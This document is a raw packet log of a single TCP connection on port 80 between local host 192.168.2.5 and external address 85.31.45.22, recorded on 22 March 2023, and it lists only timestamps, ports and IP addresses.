Mar 22, 2023 11:21:19.011377096 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011385918 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011405945 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011406898 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011428118 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011445999 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011446953 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011468887 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011487961 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011492014 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011509895 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011523962 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011532068 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011559010 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011559010 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011579990 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011595964 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011601925 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011624098 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011631966 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011646032 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011656046 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011667967 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011688948 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011691093 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011709929 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011725903 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011730909 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011754036 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011759996 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011775017 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011795998 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011799097 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011816025 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011828899 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011837006 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011857033 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011867046 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011878967 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011899948 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011909008 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011929989 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011950016 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011950016 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011971951 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011971951 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011992931 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012008905 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012012959 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012033939 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012047052 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012054920 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012074947 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012083054 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012094975 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012106895 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012115955 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012135983 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012150049 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012156963 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012176991 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012191057 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012198925 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012218952 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012221098 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012239933 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012245893 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012260914 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012280941 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012286901 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012326002 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012382984 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012438059 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012535095 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012579918 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012619019 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012671947 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012686968 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012744904 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012767076 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012825012 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012888908 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.012948990 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.012996912 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013082981 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013266087 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013290882 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013341904 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013398886 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013410091 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013458014 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013477087 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013495922 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013514996 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013571024 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013593912 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013614893 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013654947 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013674974 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013762951 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013819933 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013823032 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013845921 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.013880968 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013900042 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.013972998 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.014030933 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.014231920 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.014256001 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.014302015 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.014337063 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.014380932 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.014455080 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.014476061 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.014534950 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.014590979 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.014611959 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.014655113 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.014714003 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.014753103 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.014792919 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.014811993 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.014851093 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.015022039 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.015091896 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.015094995 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.015161037 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.015255928 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.015288115 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.015319109 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.015357018 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.015407085 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.015463114 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.015566111 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.015590906 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.015626907 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.015662909 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.015827894 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.015857935 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.015887976 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.015923023 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.016040087 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.016098022 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.016134977 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.016190052 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.016226053 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.016278028 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.016290903 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.016343117 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.016417027 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.016484022 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.016550064 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.016571999 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.016606092 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.016644001 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.016697884 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.016751051 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.016805887 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.016913891 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.016963959 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.016963959 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.017059088 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.017112017 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.017169952 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.017222881 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.017287016 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.017342091 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.017458916 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.017600060 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.017623901 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.017625093 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.017657042 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.017690897 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.017694950 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.017755032 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.017849922 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.017904043 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.018065929 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.018094063 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.018125057 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.018138885 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.018141031 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.018183947 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.018299103 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.018354893 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.018440962 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.018490076 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.018500090 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.018544912 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.018549919 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.018596888 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.018680096 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.018737078 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.018841028 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.018892050 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.018930912 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.018984079 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.019061089 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.019113064 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.019140959 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.019196987 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.019387007 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.019414902 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.019449949 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.019473076 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.019520998 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.019548893 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.019567966 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.019604921 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.019610882 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.019654989 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.019778013 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.019829035 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.019887924 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.019944906 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.019985914 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.020031929 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.020266056 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.020288944 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.020329952 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.020349026 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.020556927 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.020581007 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.020600080 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.020612955 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.020637035 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.020657063 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.020694971 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.020739079 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.020818949 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.020867109 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.020909071 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.020967960 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.020975113 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.021044016 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.021111965 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.021161079 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.021258116 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.021310091 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.021317959 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.021374941 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.021476984 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.021501064 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.021531105 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.021550894 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.021657944 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.021681070 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.021714926 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.021733999 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.021893978 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.021943092 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.021975994 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.022034883 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.022069931 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.022125959 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.022349119 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.022380114 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.022403955 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.022432089 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.022540092 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.022569895 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.022588015 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.022598028 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.022629976 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.022656918 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.022777081 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.022830009 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.022938967 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.022960901 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.023000002 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.023000002 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.023066998 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.023113012 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.023214102 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.023262024 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.023351908 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.023395061 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.023744106 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.023777962 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.023819923 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.023843050 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024220943 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024249077 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024269104 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024282932 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024324894 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024324894 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024362087 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024390936 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024405956 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024418116 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024439096 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024457932 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024466991 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024466991 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024477959 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024506092 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024569988 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024580002 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024641037 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024770021 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024811029 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024912119 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.024966002 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.024979115 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.025037050 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.025058031 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.025105000 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.025182009 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.025228024 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.025299072 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.025348902 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.025384903 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.025409937 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.025435925 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.025460958 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.028299093 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028332949 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028358936 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028387070 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028395891 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.028409004 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028429031 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028429985 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.028450966 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028470039 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028485060 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.028491974 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028512001 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028517962 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.028532982 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028537035 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.028553963 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.028582096 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.028700113 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039161921 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039195061 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039212942 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039233923 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039252996 CET	80	49694	85.31.45.22	192.168.2.5
